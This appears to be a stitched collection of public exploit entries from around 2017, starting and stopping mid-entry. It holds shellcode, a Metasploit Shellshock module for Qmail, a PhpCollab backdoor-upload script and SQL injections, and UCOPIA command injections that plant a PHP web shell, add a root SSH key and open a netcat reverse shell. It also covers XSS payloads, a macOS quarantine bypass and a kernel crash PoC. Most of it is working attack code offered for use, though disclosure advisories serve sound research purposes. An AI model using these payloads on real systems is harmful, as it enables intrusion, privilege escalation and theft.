sc += "\x42\x75\x4a\x49\x39\x6c\x68\x68\x6e\x62\x45\x50\x75\x50\x37\x70"
sc += "\x31\x70\x6f\x79\x78\x65\x66\x51\x6b\x70\x50\x64\x4e\x6b\x52\x70"
sc += "\x56\x50\x6c\x4b\x51\x42\x44\x4c\x6e\x6b\x43\x62\x55\x44\x6e\x6b"
sc += "\x64\x32\x57\x58\x76\x6f\x68\x37\x42\x6a\x47\x56\x44\x71\x49\x6f"
sc += "\x6c\x6c\x75\x6c\x75\x31\x73\x4c\x73\x32\x76\x4c\x31\x30\x6a\x61"
sc += "\x4a\x6f\x74\x4d\x66\x61\x5a\x67\x38\x62\x4b\x42\x52\x72\x70\x57"
sc += "\x4e\x6b\x52\x72\x66\x70\x6c\x4b\x33\x7a\x35\x6c\x6c\x4b\x42\x6c"
sc += "\x77\x61\x52\x58\x6a\x43\x37\x38\x55\x51\x6b\x61\x33\x61\x4e\x6b"
sc += "\x73\x69\x65\x70\x47\x71\x7a\x73\x6e\x6b\x67\x39\x36\x78\x4b\x53"
sc += "\x75\x6a\x72\x69\x6e\x6b\x45\x64\x4e\x6b\x43\x31\x58\x56\x56\x51"
sc += "\x79\x6f\x6e\x4c\x6b\x71\x6a\x6f\x34\x4d\x43\x31\x39\x57\x65\x68"
sc += "\x39\x70\x71\x65\x7a\x56\x73\x33\x51\x6d\x5a\x58\x45\x6b\x51\x6d"
sc += "\x44\x64\x74\x35\x4d\x34\x30\x58\x4e\x6b\x31\x48\x74\x64\x75\x51"
sc += "\x4a\x73\x65\x36\x4c\x4b\x54\x4c\x32\x6b\x4e\x6b\x36\x38\x57\x6c"
sc += "\x53\x31\x48\x53\x4c\x4b\x75\x54\x4c\x4b\x77\x71\x7a\x70\x4f\x79"
sc += "\x77\x34\x61\x34\x64\x64\x61\x4b\x43\x6b\x61\x71\x43\x69\x71\x4a"
sc += "\x62\x71\x59\x6f\x6b\x50\x61\x4f\x33\x6f\x33\x6a\x6c\x4b\x46\x72"
sc += "\x78\x6b\x4c\x4d\x43\x6d\x73\x5a\x37\x71\x6c\x4d\x6e\x65\x58\x32"
sc += "\x47\x70\x55\x50\x47\x70\x32\x70\x45\x38\x56\x51\x4c\x4b\x42\x4f"
sc += "\x6f\x77\x69\x6f\x4b\x65\x4f\x4b\x78\x70\x6e\x55\x69\x32\x53\x66"
sc += "\x65\x38\x4f\x56\x6c\x55\x4f\x4d\x6d\x4d\x6b\x4f\x4a\x75\x45\x6c"
sc += "\x66\x66\x53\x4c\x75\x5a\x6f\x70\x69\x6b\x69\x70\x42\x55\x53\x35"
sc += "\x6d\x6b\x51\x57\x65\x43\x31\x62\x42\x4f\x71\x7a\x45\x50\x72\x73"
sc += "\x4b\x4f\x78\x55\x35\x33\x35\x31\x32\x4c\x55\x33\x46\x4e\x75\x35"
sc += "\x43\x48\x50\x65\x55\x50\x41\x41"
buff += sc
f = open("shareName.txt","wb")
f.write(buff)
f.close()
# Exploit Title: Unauthenticated remote root code execution on captive
portal Ucopia <= 5.1
# Date: 02/10/17
# Exploit Author: agix
# Vendor Homepage: http://www.ucopia.com/
# Version: <= 5.1
# Don't know in which version they exactly fixed it.
# When you connect to Ucopia wifi guest, every requests are redirected to controller.access.network
# First create easier to use php backdoor
https://controller.access.network/autoconnect_redirector.php?client_ip=127.0.0.1;echo%20'<?php system($_GET[0]);%20?>'>/var/www/html/upload/bd.php;echo%20t
# As php is in sudoers without password...
https://controller.access.network/upload/bd.php?0=sudo%20/usr/bin/php%20-r%20%27system("id");%27
# Just push your ssh key and get nice root access (ssh is open by default even from wifi guest)
https://controller.access.network/upload/bd.php?0=sudo%20/usr/bin/php%20-r%20%27system("echo%20ssh-rsa%20AAAA[...]%20>>%20/root/.ssh/authorized_keys");%27
# Exploit Title: Multiple Stored XSS in EPESI
# Date: 10/03/2017
# Exploit Author: Zeeshan Shaikh
# Vendor Homepage: http://epe.si/
# Software Link: http://epe.si/download/
# Version: 1.8.2 rev20170830
# CVE : CVE-2017-14712 to CVE-2017-14717
# Category: webapps
XSS 1 (Tasks - Title)
Steps to recreate:
1. Home->Tasks->add new
2. Enter title as "MYTITLE" and fill required details but don't click save
3. Start interceptor and intercept request
4. click save
5. Now replace MYTITLE with "<i onclick=alert(1)>alertme</i>"(without
quotes)
6. Home->click on alertme
XSS 2 (Tasks - Description)
Steps to recreate:
1. Create a new task and fill description as "MYDESC" but don't click on
save
2. Start intercepting request and then click save on browser
3. Now replace MYDESC with "<script>alert(1)</script>"
4. Go to Home(make sure task applet is there) -> Mouseover on i icon
XSS 3 (Tasks/Phonecall - Notes - Title)
Steps to recreate:
1. Home->Tasks/PhoneCall->Notes->add new
2. Steps same as XSS 1
3. Click on alertme in notes section
XSS 4 (Tasks - Alerts - Title)
Steps to recreate:
1. Home->Tasks->Notes->add new
2. Steps same as XSS 1
3. Click on alertme in alerts section
XSS 5 (Phonecalls - Subject)
Steps to recreate:
1. Create a new phonecall and fill subject as "MYSUB" but don't click on
save
2. Start intercepting request and then click save on browser
3. Now replace MYSUB with "<script>alert(1)</script>"
4. Go to Home(make sure task applet is there) -> Mouseover on i icon
XSS 6 (Phonecalls - Description)
Same as XSS 5
Title: Mac OS X Local Javascript Quarantine Bypass
Product: Mac OS X
Version: 10.12, 10.11, 10.10 and probably prior
Vendor: apple.com <http://apple.com/>
Type: DOM Based XSS
Risk level: 3 / 5
Credits: filippo.cavallarin@wearesegment.com <mailto:filippo.cavallarin@wearesegment.com>
CVE: N/A
Vendor notification: 2017-07-15
Vendor fix: 2017-09-25
Public disclosure: 2017-09-28
DETAILS
Mac OS X contains a vulnerability that allows the bypass of the Apple Quarantine and the execution of arbitrary
Javascript code without restrictions.
Basically, Apple's Quarantine works by setting an extended attribute to downloaded files (and also to files
extracted from downloaded archive/image) that tells the system to open/execute those files in a restricted
environment. For example, a quarantined html file won't be able to load local resources.
The vulnerability is in one html file, part of the Mac OS X core, that is prone to a DOM Based XSS allowing the
excution of arbitrary javascript commands in its (unrestricted) context.
The mentioned file is located at /System/Library/CoreServices/HelpViewer.app/Contents/Resources/rhtmlPlayer.html
and contains the following code:
<script type="text/javascript" charset="utf-8">
setBasePathFromString(urlParam("rhtml"));
loadLocStrings();
loadJavascriptLibs();
function init () { /* <-- called by <body onload="init()" */
[...]
rHTMLPath = urlParam("rhtml"); /* <-- takes 'rhtml' parameters from current url */
[...]
self.contentHttpReq.open('GET', rHTMLPath, true);
self.contentHttpReq.onreadystatechange = function() {
if (self.contentHttpReq.readyState == 4) {
loadTutorial(self.contentHttpReq.responseText);
}
}
[...]
}
function loadTutorial(response) {
var rHTMLPath = urlParam("rhtml");
// this will create a tutorialData item
eval(response);
[...]
}
function loadLocStrings()
{
var headID = document.getElementsByTagName("head")[0];
var rHTMLPath = urlParam("rhtml");
rHTMLPath = rHTMLPath.replace("metaData.html", "localizedStrings.js");
var newScript = document.createElement('script');
newScript.type = 'text/javascript';
newScript.src = rHTMLPath;
headID.appendChild(newScript);
}
[...]
</script>
In short, it takes an url from the "rhtml" query string parameter, makes a request to that url and evaluates
the response content as javascript code.
The code below contains two different DOM Based XSS.
The first is in the loadLocStrings() function that creates a SCRIPT element and uses the "rhtml" parameter as
its "src" property.
The second is in the init() function that uses the "rhtml" parameter to make an ajax call and then passes the
response directly to eval().
As the result the same payload is executed twice.
An attacker, by providing a data uri, can take control of the response and thus what gets evaluated.
One possile vector of exploitation are the .webloc files. Basically those files contain an url and they simply loads
it in Safari when opened.
By crafting a .webloc file and by tricking a victim to open it, an attacker can run privileged javascript commands on
the victim's computer.
Due to the fact that .webloc files also use an extended attribute to store data, they must be sent contained in a tar
archive (or any other format that supports extended attributes).
PROOF OF CONCEPT
To reproduce the issue follow the steps below:
1. create a javascript file you want to execute on your target
2. convert its content to base64
3. encode it to a "uri component" (ex with encodeURIComponent js function)
4. use it to build a data uri as follow:
data:text/plain;base64,<urlencoded base64>
5. prepend the following string to it:
file:///System/Library/CoreServices/HelpViewer.app/Contents/Resources/rhtmlPlayer.html?rhtml= <file:///System/Library/CoreServices/HelpViewer.app/Contents/Resources/rhtmlPlayer.html?rhtml=>
6. open it with Safari
7. save it as a bookmark
8. drag the bookmark to the Finder (a .webloc file is created, if the extension is not .webloc, rename it)
9. create a tar archive containing the .webloc file
10. send it to the victim
Note that due to the behaviour of rhtmlPlayer.html, in order to access local resources, the first line of the
javascript code must be: document.getElementsByTagName("base")[0].href="";
The following bash script will take a javascript file and converts it to final "file" url:
BOF
#!/bin/bash
BASEURL="file:///System/Library/CoreServices/HelpViewer.app/Contents/Resources/rhtmlPlayer.html?rhtml= <file:///System/Library/CoreServices/HelpViewer.app/Contents/Resources/rhtmlPlayer.html?rhtml=>"
BASEJS="(function(){document.getElementsByTagName('base')[0].href='';if('_' in window)return;window._=1;"
DATAURI="data:text/plain;base64,"
JSFILE=$1
if [ "$JSFILE" = "" ]; then
echo "usage: $0 <jsfile>"
exit 1
fi
JS=$BASEJS`cat $JSFILE`"})();"
ENCJS=`echo -n $JS | base64 | sed 's/=/%3D/g' | sed 's/+/%2F/g' | sed 's/\//%2B/g'`
URL="$BASEURL""$DATAURI""$ENCJS"
echo -ne "Paste the url below into Safari's url bar:\n\033[33m$URL\033[0m\n"
EOF
The following javascript code will alert the /etc/passwd file on the victim's computer:
BOF
xhr = new XMLHttpRequest();
xhr.open("GET", "/etc/passwd", true);
xhr.onreadystatechange = function(){
if (xhr.readyState == 4) {
alert(xhr.responseText);
}
};
xhr.send();
EOF
Note that only Safari will successfully load local resources via ajax (Chrome and Firefox won't). In this
exploitation process it's not an issue since .webloc files are always opened with Safari.
NOTE
This issue has been silently fixed in Mac OS X High Sierra and (at time of writing) there is no mention of this
bug in Apple's changelog.
No CVE has been assigned by Apple.
SOLUTION
Upgrade to Mac OS X High Sierra or simply remove rhtmlPlayer.html.
Safari 11 (available for Mac OS X 10.11, 10.12 and 10.13) introduces the following security henancement:
"CORS and cross origin access from file:// are now blocked unless Disable Local File Restrictions is selected from the Develop menu"
hence the above exploit will not work against updated versions of OSX El Capitan and Sierra. However javascript execution outside quarantine is still possible.
REFERENCES
https://www.wearesegment.com/research/Mac-OS-X-Local-Javascript-Quarantine-Bypass.html <https://www.wearesegment.com/research/Mac-OS-X-Local-Javascript-Quarantine-Bypass.html>
DISCLOSURE
This vulnerability has been disclosed thru Securiteam Secure Disclosure program: http://www.beyondsecurity.com/ssd <http://www.beyondsecurity.com/ssd>
# Exploit Title: Fiberhome an5506-04-f – -PING- COMMAND INJECTION
# Date: 03.10.2017
# Exploit Author: Tauco
# Vendor Homepage: http://hk.fiberhomegroup.com
# Version: RP2609
# Tested on: Windows 10
Description:
===========================================================================
Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application.
https://www.owasp.org/index.php/Command_Injection
Proof of Concepts :
=======================================
1. Go to the Default Gateway
2. Open the application
3. Open diagnosis
4. Input command to the Destination Address
5. Click Ping
ping_ip=127.0.0.1;whoami;id
PING 127.0.0.1 (127.0.0.1): 56 data bytes
64 bytes from 127.0.0.1: seq=0 ttl=64 time=0.617 ms
64 bytes from 127.0.0.1: seq=1 ttl=64 time=0.259 ms
64 bytes from 127.0.0.1: seq=2 ttl=64 time=0.215 ms
64 bytes from 127.0.0.1: seq=3 ttl=64 time=0.214 ms
64 bytes from 127.0.0.1: seq=4 ttl=64 time=0.218 ms
--- 127.0.0.1 ping statistics ---
5 packets transmitted, 5 packets received, 0% packet loss
round-trip min/avg/max = 0.214/0.304/0.617 ms
root
uid=0(root) gid=0 groups=0
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Smtp
def initialize(info={})
super(update_info(info,
'Name' => 'Qmail SMTP Bash Environment Variable Injection (Shellshock)',
'Description' => %q{
This module exploits a shellshock vulnerability on Qmail, a public
domain MTA written in C that runs on Unix systems.
Due to the lack of validation on the MAIL FROM field, it is possible to
execute shell code on a system with a vulnerable BASH (Shellshock).
This flaw works on the latest Qmail versions (qmail-1.03 and
netqmail-1.06).
However, in order to execute code, /bin/sh has to be linked to bash
(usually default configuration) and a valid recipient must be set on the
RCPT TO field (usually admin@exampledomain.com).
The exploit does not work on the "qmailrocks" community version
as it ensures the MAILFROM field is well-formed.
},
'Author' =>
[
'Mario Ledo (Metasploit module)',
'Gabriel Follon (Metasploit module)',
'Kyle George (Vulnerability discovery)'
],
'License' => MSF_LICENSE,
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'References' =>
[
['CVE', '2014-6271'],
['CWE', '94'],
['OSVDB', '112004'],
['EDB', '34765'],
['URL', 'http://seclists.org/oss-sec/2014/q3/649'],
['URL', 'https://lists.gt.net/qmail/users/138578']
],
'Payload' =>
{
'BadChars' => "\x3e",
'Space' => 888,
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic telnet perl ruby python'
# telnet ruby python and perl works only if installed on target
}
},
'Targets' => [ [ 'Automatic', { }] ],
'DefaultTarget' => 0,
'DisclosureDate' => 'Sep 24 2014'
))
deregister_options('MAILFROM')
end
def smtp_send(data = nil)
begin
result = ''
code = 0
sock.put("#{data}")
result = sock.get_once
result.chomp! if (result)
code = result[0..2].to_i if result
return result, code
rescue Rex::ConnectionError, Errno::ECONNRESET, ::EOFError
return result, 0
rescue ::Exception => e
print_error("#{rhost}:#{rport} Error smtp_send: '#{e.class}' '#{e}'")
return nil, 0
end
end
def exploit
to = datastore['MAILTO']
connect
result = smtp_send("HELO localhost\r\n")
if result[1] < 200 || result[1] > 300
fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))
end
print_status('Sending the payload...')
result = smtp_send("mail from:<() { :; }; " + payload.encoded.gsub!(/\\/, '\\\\\\\\') + ">\r\n")
if result[1] < 200 || result[1] > 300
fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))
end
print_status("Sending RCPT TO #{to}")
result = smtp_send("rcpt to:<#{to}>\r\n")
if result[1] < 200 || result[1] > 300
fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))
end
result = smtp_send("data\r\n")
if result[1] < 200 || result[1] > 354
fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))
end
result = smtp_send("data\r\n\r\nfoo\r\n\r\n.\r\n")
if result[1] < 200 || result[1] > 300
fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))
end
disconnect
end
end
# # # # #
# Exploit Title: ConverTo Video Downloader & Converter 1.4.1 - Arbitrary File Download
# Dork: N/A
# Date: 29.09.2017
# Vendor Homepage: https://codecanyon.net/user/lemonadeflirt
# Software Link: https://codecanyon.net/item/converto-video-downloader-converter/13225966
# Demo: http://vd.googglet.com/
# Version: 1.4.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The security obligation allows an attacker to arbitrary download files..
#
# Vulnerable Source:
#
# .............
# <?php
#
# include_once('.......php');
# // Check download token
# if (empty($_GET['mime']) OR empty($_GET['token']))
# {
# exit('Invalid download token 8{');
# }
#
# // Set operation params
# $mime = filter_var($_GET['mime']);
# $ext = str_replace(array('/', 'x-'), '', strstr($mime, '/'));
# $url = base64_decode(filter_var($_GET['token']));
# $name = urldecode($_GET['title']). '.' .$ext;
#
# ?>
# .............
# Proof of Concept:
#
# http://localhost/[PATH]/download.php?mime=video/webm&title=Efe&token=[FILENAME_to_BASE64]
#
# Etc...
# # # # #
/*
# Exploit Title: Linux Kernel<4.14.rc3 Local Denial of Service
# Date: 2017-Oct-02
# Exploit Author: Wang Chenyu (Nanyang Technological University)
# Version:Linux kernel 4-14-rc1
# Tested on:Ubuntu 16.04 desktop amd64
# CVE : CVE-2017-14489
# CVE description: This CVE is assigned to Wang Chunyu (Red Hat) and
discovered by Syzkaller. Provided for legal security research and testing
purposes ONLY.
In this POC, skb_shinfo(SKB)->nr_frags was overwritten by ev->iferror = err
(0xff) in the condition where nlh->nlmsg_len==0x10 and skb->len >
nlh->nlmsg_len.
POC:
*/
#include <sys/socket.h>
#include <linux/netlink.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#define NETLINK_USER 31
#define MAX_PAYLOAD 1024 /* maximum payload size*/
struct sockaddr_nl src_addr, dest_addr;
struct nlmsghdr *nlh = NULL;
struct iovec iov;
int sock_fd;
struct msghdr msg;
int main()
{
sock_fd=socket(PF_NETLINK, SOCK_RAW, NETLINK_ISCSI);
if(sock_fd<0)
return -1;
memset(&src_addr, 0, sizeof(src_addr));
src_addr.nl_family = AF_NETLINK;
src_addr.nl_pid = getpid(); /* self pid */
bind(sock_fd, (struct sockaddr*)&src_addr, sizeof(src_addr));
memset(&dest_addr, 0, sizeof(dest_addr));
memset(&dest_addr, 0, sizeof(dest_addr));
dest_addr.nl_family = AF_NETLINK;
dest_addr.nl_pid = 0; /* For Linux Kernel */
dest_addr.nl_groups = 0; /* unicast */
nlh = (struct nlmsghdr *)malloc(NLMSG_SPACE(MAX_PAYLOAD));
memset(nlh, 0, NLMSG_SPACE(MAX_PAYLOAD));
nlh->nlmsg_len = 0xac;
nlh->nlmsg_pid = getpid();
nlh->nlmsg_flags = 0;
strcpy(NLMSG_DATA(nlh), "ABCDEFGHabcdefghABCDEFGHabcdef
ghABCDEFGHabcdefghABCDEFGHabcdefghABCDEFGHabcdefghABCDEFGHab
cdefghAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCDDDDDDDDDDDD\x10");
iov.iov_base = (void *)nlh;
iov.iov_len = 0xc0;
msg.msg_name = (void *)&dest_addr;
msg.msg_namelen = sizeof(dest_addr);
msg.msg_iov = &iov;
msg.msg_iovlen = 1;
printf("Sending message to kernel\n");
sendmsg(sock_fd,&msg,0);
printf("Waiting for message from kernel\n");
/* Read message from kernel */
recvmsg(sock_fd, &msg, 0);
printf("Received message payload: %s\n", (char *)NLMSG_DATA(nlh));
close(sock_fd);
}
Crash info:
[ 17.880629] BUG: unable to handle kernel NULL pointer dereference at
0000000000000028
[ 17.881586] IP: skb_release_data+0x77/0x110
[ 17.882093] PGD 7b02a067 P4D 7b02a067 PUD 7b02b067 PMD 0
[ 17.882743] Oops: 0002 [#1] SMP
[ 17.883123] Modules linked in:
[ 17.883493] CPU: 1 PID: 2687 Comm: test02 Not tainted 4.14.0-rc1+ #1
[ 17.884251] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS
Ubuntu-1.8.2-1ubuntu1 04/01/2014
[ 17.885350] task: ffff88007c5a1900 task.stack: ffffc90000e10000
[ 17.886058] RIP: 0010:skb_release_data+0x77/0x110
[ 17.886590] RSP: 0018:ffffc90000e13c08 EFLAGS: 00010202
[ 17.887213] RAX: 000000000000000d RBX: ffff88007bd50300 RCX:
ffffffff820f96a0
[ 17.888059] RDX: 000000000000000c RSI: 0000000000000010 RDI:
000000000000000c
[ 17.888893] RBP: ffffc90000e13c20 R08: ffffffff820f9860 R09:
ffffc90000e13ad8
[ 17.889712] R10: ffffea0001ef5400 R11: ffff88007d001700 R12:
0000000000000000
[ 17.890349] R13: ffff88007be710c0 R14: 00000000000000c0 R15:
0000000000000000
[ 17.890977] FS: 00007f7614d4c700(0000) GS:ffff88007fd00000(0000)
knlGS:0000000000000000
[ 17.891592] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 17.892054] CR2: 0000000000000028 CR3: 000000007b022000 CR4:
00000000000006e0
[ 17.892629] Call Trace:
[ 17.892833] skb_release_all+0x1f/0x30
[ 17.893140] consume_skb+0x27/0x90
[ 17.893418] netlink_unicast+0x16a/0x210
[ 17.893735] netlink_sendmsg+0x2a3/0x390
[ 17.894050] sock_sendmsg+0x33/0x40
[ 17.894336] ___sys_sendmsg+0x29e/0x2b0
[ 17.894650] ? __wake_up_common_lock+0x7a/0x90
[ 17.895009] ? __wake_up+0xe/0x10
[ 17.895280] ? tty_write_unlock+0x2c/0x30
[ 17.895606] ? tty_ldisc_deref+0x11/0x20
[ 17.895925] ? n_tty_open+0xd0/0xd0
[ 17.896211] ? __vfs_write+0x23/0x130
[ 17.896512] __sys_sendmsg+0x40/0x70
[ 17.896805] ? __sys_sendmsg+0x40/0x70
[ 17.897133] SyS_sendmsg+0xd/0x20
[ 17.897408] entry_SYSCALL_64_fastpath+0x13/0x94
[ 17.897783] RIP: 0033:0x7f7614886320
[ 17.898186] RSP: 002b:00007fff6f17f9c8 EFLAGS: 00000246 ORIG_RAX:
000000000000002e
[ 17.898793] RAX: ffffffffffffffda RBX: 00007f7614b2e7a0 RCX:
00007f7614886320
[ 17.899368] RDX: 0000000000000000 RSI: 0000000000600fc0 RDI:
0000000000000003
[ 17.899943] RBP: 0000000000000053 R08: 00000000ffffffff R09:
0000000000000000
[ 17.900521] R10: 0000000000000000 R11: 0000000000000246 R12:
0000000000400b9e
[ 17.901095] R13: 00007f7614d50000 R14: 0000000000000019 R15:
0000000000400b9e
[ 17.901672] Code: 45 31 e4 41 80 7d 02 00 48 89 fb 74 32 49 63 c4 48 83
c0 03 48 c1 e0 04 49 8b 7c 05 00 48 8b 47 20 48 8d 50 ff a8 01 48 0f 45 fa
<f0> ff 4f 1c 74 7a 41 0f b6 45 02 41 83 c4 01 44 39 e0 7f ce 49
[ 17.903190] RIP: skb_release_data+0x77/0x110 RSP: ffffc90000e13c08
[ 17.903689] CR2: 0000000000000028
[ 17.903980] ---[ end trace 2f1926fbc1d32679 ]---
Reference:
[1] https://patchwork.kernel.org/patch/9923803/
[2] https://github.com/google/syzkaller
NPM-V(Network Power Manager) <= 2.4.1 Reset Password Vulnerability
Author: Saeed reza Zamanian [penetrationtest @ Linkedin]
Product: NPM-V
Affected Version : 2.4.1 and below
Vendor : http://www.china-clever.com
Product Link : http://www.china-clever.com/en/index.php/product?view=products&cid=125
Date: 2017 Sep 25
Manual: ftp://support.danbit.dk/N/NPOWER8IEC-E/NPM-V%20User%20Manual.pdf
[*] NPM Introduction:
The NPM(Network Power Manager) is a network manageable device that provides power monitoring,
controlling and managements to many equipments in the rack cabinet of data center all over the world through
LAN or WAN. For meeting with the restrictions and requirements in different environment, NPM supplies many
connection methods that user can manage it through its Web interface(HTTP or HTTPS), Serial connection, Telnet
or SNMP
[*] Vulnerability Details:
Based on security Check on this device , Authentication doesn't check on Device Admin Console
an attacker can access to management console pages directly and without authentication.
All files in these directories are directly accessible . /log/ /chart /device and /user .
[*] PoC:
An Attacker can directly access to below page and Add User or View Password or Change Administrator credential without authentication.
if you browse this page you will see an html page likely the image exists on Page 13 (Figure 1-4) on Device Users Manual.
http://[Device IP]/user/user.html
#EOF
# [CVE-2017-6090] PhpCollab 2.5.1 Arbitrary File Upload (unauthenticated)
## Description
PhpCollab is an open source web-based project management system, that enables collaboration across the Internet.
## Arbitrary File Upload
The phpCollab code does not correctly filter uploaded file contents. An unauthenticated attacker may upload and execute arbitrary code.
**CVE ID**: CVE-2017-6090
**Access Vector**: remote
**Security Risk**: Critical
**Vulnerability**: CWE-434
**CVSS Base Score**: 10 (Critical)
**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
### Proof of Concept
The following HTTP request allows an attacker to upload a malicious php file, without authentication.
Thus, a file named after `$id.extension` is created.
For example, a backdoor file can be reached at `http://phpCollab.lan/logos_clients/1.php`.
```
POST /clients/editclient.php?id=1&action=update HTTP/1.1
Host: phpCollab.lan
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------154934846911423734231554128137
Content-Length: 252
-----------------------------154934846911423734231554128137
Content-Disposition: form-data; name="upload"; filename="backdoor.php"
Content-Type: application/x-php
<?php phpinfo(); ?>
-----------------------------154934846911423734231554128137--
```
### Vulnerable code
The vulnerable code is found in `clients/editclient.php`, line 63.
```
$extension = strtolower( substr( strrchr($_FILES['upload']['name'], ".") ,1) );
if(@move_uploaded_file($_FILES['upload']['tmp_name'], "../logos_clients/".$id.".$extension"))
{
chmod("../logos_clients/".$id.".$extension",0666);
$tmpquery = "UPDATE ".$tableCollab["organizations"]." SET extension_logo='$extension' WHERE id='$id'";
connectSql("$tmpquery");
}
```
### Exploit code
```
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import requests
if __name__ == '__main__':
if (len(sys.argv) != 4):
print("Enter your target, userid and path for file upload like : python exploit.py http://www.phpCollabURL.lan 1 /tmp/test.php")
sys.exit(1)
target = "%s/clients/editclient.php?id=%s&action=update" % (sys.argv[1], sys.argv[2])
print("[*] Trying to exploit with URL : %s..." % target)
backdoor = {'upload': open(sys.argv[3], 'rb')}
r = requests.post(target, files=backdoor)
extension = os.path.splitext(sys.argv[3])[1]
link = "%s/logos_clients/%s%s" % (sys.argv[1], sys.argv[2], extension )
r = requests.get(link)
if r.status_code == 200:
print("[OK] Backdoor link : %s" % link)
else:
print("[FAIL]Problem (status:%s) (link:%s)" % (r.status_code, link))
```
## Solution
Update to the latest version avalaible.
## Affected versions
* Version <= 2.5.1
## Timeline (dd/mm/yyyy)
* 27/08/2016 : Initial discovery.
* 05/10/2016 : Initial contact.
* 11/10/2016 : GPG Key exchange.
* 19/10/2016 : Advisory sent to vendor.
* 13/02/2017 : First fixes.
* 15/02/2017 : Fixes validation by Sysdream.
* 21/02/2017 : PhpCollab ask to wait before publish.
* 21/06/2017 : New version has been released.
* 29/09/2017 : Public disclosure.
## Credits
* Nicolas SERRA, Sysdream (n.serra -at- sysdream -dot- com)
--
SYSDREAM Labs <labs@sysdream.com>
GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1
* Website: https://sysdream.com/
* Twitter: @sysdream
# [CVE-2017-11322] UCOPIA Wireless Appliance < 5.1.8 Privileges Escalation
## Asset description
UCOPIA solutions bring together a combination of software, appliance and cloud services serving small to large customers.
More than 12,000 UCOPIA solutions are deployed and maintained by UCOPIA expert partners all over the world.
The affected asset in this report is a WiFi management appliance.
## Vulnerability
CHROOT escape and privileges escalation.
**Threat**
Improper sanitization of system commands in the chroothole_client executable in UCOPIA Wireless Appliance, prior to 5.1.8, allows local attackers to elevate privileges to root user and escape from the *chroot*.
**CVE ID**: CVE-2017-11322
**Access Vector**: local
**Security Risk**: high
**Vulnerability**: CWE-78
**CVSS Base Score**: 8.2 (High)
**CVSS Vector**: CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
### Proof of Concept: chroot escape / privileges escalation
The **chroothole_client** binary is used by the appliance to run programs outside the *chroot*, as the **root** user.
Because of an improper sanitization of system commands, we managed to gain a complete **root** access to the appliance, outside the *chroot*.
```
$ chroothole_client '/usr/sbin/status'
is not running ... failed !
$ chroothole_client '/usr/sbin/status $(which nc)'
/bin/nc is not running ... failed!
$ chroothole_client '/usr/sbin/status $(nc 10.0.0.125 4444 -e /bin/sh)'
```
Attacker terminal :
```
$ ncat -lvp 4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.0.0.1:49156.
whoami
root
```
## Solution
Update to UCOPIA 5.1.8
## Timeline (dd/mm/yyyy)
* 08/03/2017 : Vulnerability discovery.
* 03/05/2017 : Initial contact.
* 10/05/2017 : GPG Key exchange.
* 10/05/2017 : Advisory sent to vendor.
* 17/05/2017 : Request for feedback.
* 22/05/2017 : Vendor acknowledge the vulnerabilities.
* 21/06/2017 : Sysdream Labs request for an ETA, warning for public disclosure.
* 21/06/2017 : Vendor say that the UCOPIA 5.1.8 fixes the issue.
* 29/09/2017 : Public disclosure.
## Credits
* Nicolas CHATELAIN, Sysdream (n.chatelain -at- sysdream -dot- com)
--
SYSDREAM Labs <labs@sysdream.com>
GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1
* Website: https://sysdream.com/
* Twitter: @sysdream
# [CVE-2017-6089] PhpCollab 2.5.1 Multiple SQL Injections (unauthenticated)
## Description
PhpCollab is an open source web-based project management system, that enables collaboration across the Internet.
## SQL injections
The phpCollab code does not correctly filter arguments, allowing arbitrary SQL code execution by an unauthenticated user.
**CVE ID**: CVE-2017-6089
**Access Vector**: remote
**Security Risk**: Critical
**Vulnerability**: CWE-89
**CVSS Base Score**: 10 (Critical)
**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:H
## Proof of Concept 1
The following HTTP request allows an attacker to extract data using SQL injections in either the `project` or `id` parameter (it requires at least one topic):
```
http://phpCollab.lan/topics/deletetopics.php?project=1'+and+(SELECT+SLEEP(5)+FROM+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116))+and+'2'='2
http://phpCollab.lan/topics/deletetopics.php?project=1&id=1+and+(SELECT+SLEEP(5)+FROM+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116))
```
### Vulnerable code
The vulnerable code is found in `topics/deletetopics.php`, line 9.
```
if ($action == "delete") {
$id = str_replace("**",",",$id);
$tmpquery1 = "DELETE FROM ".$tableCollab["topics"]." WHERE id = $id";
$tmpquery2 = "DELETE FROM ".$tableCollab["posts"]." WHERE topic = $id";
$pieces = explode(",",$id);
$num = count($pieces);
connectSql("$tmpquery1");
connectSql("$tmpquery2");
```
## Proof of Concept 2
